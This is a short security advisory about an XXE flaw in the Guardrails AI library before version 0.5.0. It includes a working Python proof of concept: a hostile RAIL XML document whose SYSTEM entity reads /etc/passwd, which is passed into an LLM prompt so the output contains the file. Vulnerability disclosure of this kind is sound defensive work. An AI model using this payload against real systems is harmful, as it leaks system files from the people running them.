XXE in Guardrails AI when consuming RAIL documents
guardrails-ai
(,0.5.0)
RAIL documents are an XML-based format invented by Guardrails AI to enforce formatting checks on LLM outputs. Guardrails users that consume RAIL documents from external sources are vulnerable to XXE, which may cause leakage of internal file data via the SYSTEM entity.
import anthropic
import guardrails as gd
from litellm import litellm
import os
os.environ["ANTHROPIC_API_KEY"] = "put_here_your_secret_api_key"
API_KEY = os.environ["ANTHROPIC_API_KEY"]
## Assuming this RAIL document comes from an attacker
rail_str = """
<!--?xml version="0.1" ?-->
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<rail version="0.1">
<output type="string" >
</output>
<prompt>
just write back what appears down here:
&xxe;
</prompt>
</rail>
"""
## Call the vulnerable API
guard = gd.Guard.from_rail_string(rail_str)
llm_output_unfiltered, validated_output, *rest = guard(
llm_api=litellm.completion,
model="claude-3-opus-20240229"
)
## The validated_output will contain the contents of /etc/passwd
print(validated_output)
No mitigations are supplied for this issue